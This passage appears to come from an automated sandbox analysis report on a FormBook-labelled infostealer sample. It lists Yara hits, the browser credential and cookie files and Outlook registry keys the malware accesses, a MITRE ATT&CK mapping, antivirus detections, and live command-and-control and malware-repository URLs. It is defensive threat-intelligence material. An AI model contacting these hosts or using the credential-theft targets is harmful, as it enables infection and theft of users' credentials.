Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Queries volume information: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: Yara match	File source: 9.2.P1 HWT623ATG.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.P1 HWT623ATG.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.3719971214.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3723441735.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3709324958.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3719882402.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1575209433.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1575852421.0000000000BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1578650551.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3719927203.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\compact.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match	File source: 9.2.P1 HWT623ATG.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.P1 HWT623ATG.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.3719971214.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3723441735.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3709324958.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3719882402.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1575209433.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1575852421.0000000000BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1578650551.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3719927203.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	13 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 Windows Service	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Windows Service	1 Abuse Elevation Control Mechanism	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	612 Process Injection	4 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	1 Scheduled Task/Job	22 Software Packing	LSA Secrets	51 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	51 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	612 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
P1 HWT623ATG.bat.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.FormBook
P1 HWT623ATG.bat.exe	100%	Avira	HEUR/AGEN.1306292
P1 HWT623ATG.bat.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	100%	Avira	HEUR/AGEN.1306292
C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Guzzler[1].exe	11%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Smilet.exe	11%	ReversingLabs
C:\Users\user\AppData\Local\Temp\bfc.exe	11%	ReversingLabs
C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.FormBook

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label
shahaf3d.com	100%	Sophos S4	malware callhome domain
futuregainers.net	100%	Sophos S4	malware callhome domain
www.931951.com	100%	Sophos S4	malware repository domain
www.93v0.com	100%	Sophos S4	malware repository domain
srripaspocon.org	100%	Sophos S4	malware callhome domain
www.grecanici.com	100%	Sophos S4	malware repository domain
www.torentreprenad.com	100%	Sophos S4	malware repository domain
www.leadchanges.info	100%	Sophos S4	malware repository domain
www.srripaspocon.org	100%	Sophos S4	malware callhome domain
www.shahaf3d.com	100%	Sophos S4	malware callhome domain
www.futuregainers.net	100%	Sophos S4	malware callhome domain
www.navigate-power.boats	100%	Sophos S4	malware repository domain

URLs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://www.931951.com/2ha1/	100%	Sophos S4	malware repository domain
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.	100%	Sophos S4	malware callhome domain
http://www.shahaf3d.com/0a9p/?G0a=VFN0vBc0ol1ljnb0&9d=V8kIBUO99PR2h3hxIilGCb7xaYAlhXctAHbGwYfDKyusvK4qrRX5UHKQt8cO5YQS4wmk4tmPPEFmQcKp7F6SaRICxMFUNkXtPm1N7nAwt3H84qVeuxzzlvsq+rVjUlYjzq9gXVFKEYh8	100%	Sophos S4	malware callhome domain
http://www.torentreprenad.com/r45o/?9d=gzu5VRbRlKcxtienrOg/vYWmVRq4TNxrFroidVFNmLFBxOvIucJSpLXaDw+Y+myNYDD7xGaCks3CSH70SMI2pnLhFLXOBLrZylJOsjWCWApEJOKs/ooDCJFxqK6p3RZXycGtf6I8hj/U&G0a=VFN0vBc0ol1ljnb0	100%	Sophos S4	malware repository domain
https://shahaf3d.com/wp-admin/admin-ajax.php	100%	Sophos S4	malware callhome domain
http://www.93v0.com/hcaw/	100%	Sophos S4	malware repository domain
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2	100%	Sophos S4	malware callhome domain
http://www.srripaspocon.org/egr4/?9d=OombhWzhkCuNqFAQBgJWCTIe5Ku7zRL7Rc3Pxm83mLxAAziOmqPFMSLkiV9xX+4t83HRZJys59Cvhm/US+qC1S/tz9V2xJeiTRy2uMqSR06k3ZbbYlILY5knN9gwwCUqzf9nwI+FPnn/&G0a=VFN0vBc0ol1ljnb0	100%	Sophos S4	malware callhome domain
http://www.931951.com/2ha1/?G0a=VFN0vBc0ol1ljnb0&9d=r6q+x3A/FEQLw6gmNICl4m79J6xGYnb4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2LEX+h4RptWZDRuVlG4JzOnajShxrpz3BSvEogxiihZ9tHyNye+qQgWsY	100%	Sophos S4	malware repository domain
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css	100%	Sophos S4	malware callhome domain
https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg	100%	Sophos S4	malware callhome domain
http://www.93v0.com/hcaw/?9d=Xa5/huFy8Eck4v8ee+xdjh1i7ba8Clp/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNpV/H8uI+lgidsfe724rSsodQ5uAfCV2elW9ENMTuv5SSVXQJAcj0qHHf&G0a=VFN0vBc0ol1ljnb0	100%	Sophos S4	malware repository domain
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://www.shahaf3d.com/0a9p/?G0a=VFN0vBc0ol1ljnb0&9d=V8kIBUO99PR2h3hxIilGCb7xaYAlhXctAHbGwYfDKyusvK4qrRX5UHKQt8cO5YQS4wmk4tmPPEFmQcKp7F6SaRICxMFUNkXtPm1N7nAwt3H84qVeuxzzlvsq+rVjUlYjzq9gXVFKEYh8	100%	Avira URL Cloud	malware
http://www.shopnow321.online/41br/?G0a=VFN0vBc0ol1ljnb0&9d=65BU6tOk0p5LPOIIq5f29seWsrYdgC5c7tuB1xkwgoR5MWDkLOQgx5fJDEvOf4AlMkoVXixJXV15AbOmLh5rfhm5DYiSLYNIQJZpK4Rmnt3Mzv5831d4ZrhRkHRqInFW2dXaUcZHASEt	0%	Avira URL Cloud	safe
http://www.931951.com/2ha1/	100%	Avira URL Cloud	malware
http://ozon.ru/	0%	Avira URL Cloud	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Avira URL Cloud	safe
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.	100%	Avira URL Cloud	malware
https://niteothemes.com	0%	Avira URL Cloud	safe
https://optimize.google.com	0%	Avira URL Cloud	safe
http://www.torentreprenad.com/r45o/?9d=gzu5VRbRlKcxtienrOg/vYWmVRq4TNxrFroidVFNmLFBxOvIucJSpLXaDw+Y+myNYDD7xGaCks3CSH70SMI2pnLhFLXOBLrZylJOsjWCWApEJOKs/ooDCJFxqK6p3RZXycGtf6I8hj/U&G0a=VFN0vBc0ol1ljnb0	0%	Avira URL Cloud	safe
http://push.zhanzhang.baidu.com/push.js	0%	Avira URL Cloud	safe
http://www.leadchanges.info/mjuo/	100%	Sophos S4	malware repository domain
http://www.futuregainers.net/l4k7/?9d=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+RkpzmaC/oeJhPADFzgiJMLR5FtBl6eht1vjrsMq9ONCaKj3k5GiGvog+&G0a=VFN0vBc0ol1ljnb0	100%	Sophos S4	malware callhome domain
http://www.shahaf3d.com/0a9p/	100%	Sophos S4	malware callhome domain
http://www.srripaspocon.org/egr4/	100%	Sophos S4	malware callhome domain
http://www.grecanici.com/4iea/?9d=LPPTutp79E4NI/FTL4slzgCz9Mw5fMldsgpq5qffN1EY6wk4NmMiGrfPgNjCGewOe8/3zUEWliAlmzRgBncp/x6QXeu+cIhmsENqwLKbzAke2hCAvuJuIziLbcuyQtVHWzDtEtwuFhDD&G0a=VFN0vBc0ol1ljnb0	100%	Sophos S4	malware repository domain
https://td.doubleclick.net	0%	URL Reputation	safe
http://www.leadchanges.info/mjuo/?9d=GUK7oVIRF3FAoVisjIpZqa7HO+54FDT9CfoAB53ViUuzbZ1TAtWa7LnCzENP06w/wd6reHxcMz42RIoq6sWsgYEYCrnoxIy0wOTor1QdDe9x8GrLmxcBWSK4ygqmUmz0vTBYLSkIKLnt&G0a=VFN0vBc0ol1ljnb0	100%	Sophos S4	malware repository domain
https://shahaf3d.com	100%	Sophos S4	malware callhome domain
http://www.grecanici.com/4iea/	100%	Sophos S4	malware repository domain
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-72.png	0%	Avira URL Cloud	safe
https://www.googleoptimize.com	0%	Avira URL Cloud	safe
https://shahaf3d.com/wp-admin/admin-ajax.php	100%	Avira URL Cloud	malware
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	0%	Avira URL Cloud	safe
http://www.93v0.com/hcaw/	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/logo/logo-loopia-white.svg	0%	Avira URL Cloud	safe
http://www.leadchanges.info	100%	Sophos S4	malware repository domain
http://www.torentreprenad.com/r45o/	100%	Sophos S4	malware repository domain
https://www.futuregainers.net/l4k7/?9d=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywYHYqM	100%	Sophos S4	malware callhome domain
https://youtu.be/uO1hXLmT2j4	0%	Avira URL Cloud	safe
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	0%	Avira URL Cloud	safe
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	Avira URL Cloud	safe
http://www.againbeautywhiteskin.asia/3h10/?9d=9mZLXJL8GvO5ODxbtOpJ+rtZ6f1lqm3xC+OCFBImS8kNzrmbjyRfioF27F6qemRmHzSdXM7CT4wlEWpleIDtGTZ1FuoRBIGpq98dFU7vfHeXH9gl+ce92Dv1nZMBIpBNzTq2jDHLjtUw&G0a=VFN0vBc0ol1ljnb0	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css	0%	Avira URL Cloud	safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	0%	Avira URL Cloud	safe
https://fburl.com	0%	Avira URL Cloud	safe
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2	100%	Avira URL Cloud	malware
http://www.srripaspocon.org/egr4/?9d=OombhWzhkCuNqFAQBgJWCTIe5Ku7zRL7Rc3Pxm83mLxAAziOmqPFMSLkiV9xX+4t83HRZJys59Cvhm/US+qC1S/tz9V2xJeiTRy2uMqSR06k3ZbbYlILY5knN9gwwCUqzf9nwI+FPnn/&G0a=VFN0vBc0ol1ljnb0	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	Avira URL Cloud	safe
http://aliez.tv/	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/style/2022-extra-pages.css	0%	Avira URL Cloud	safe
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css	100%	Avira URL Cloud	malware
http://www.lenovest.xyz/e20q/	0%	Avira URL Cloud	safe
https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg	100%	Avira URL Cloud	malware
http://www.931951.com/2ha1/?G0a=VFN0vBc0ol1ljnb0&9d=r6q+x3A/FEQLw6gmNICl4m79J6xGYnb4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2LEX+h4RptWZDRuVlG4JzOnajShxrpz3BSvEogxiihZ9tHyNye+qQgWsY	100%	Avira URL Cloud	malware
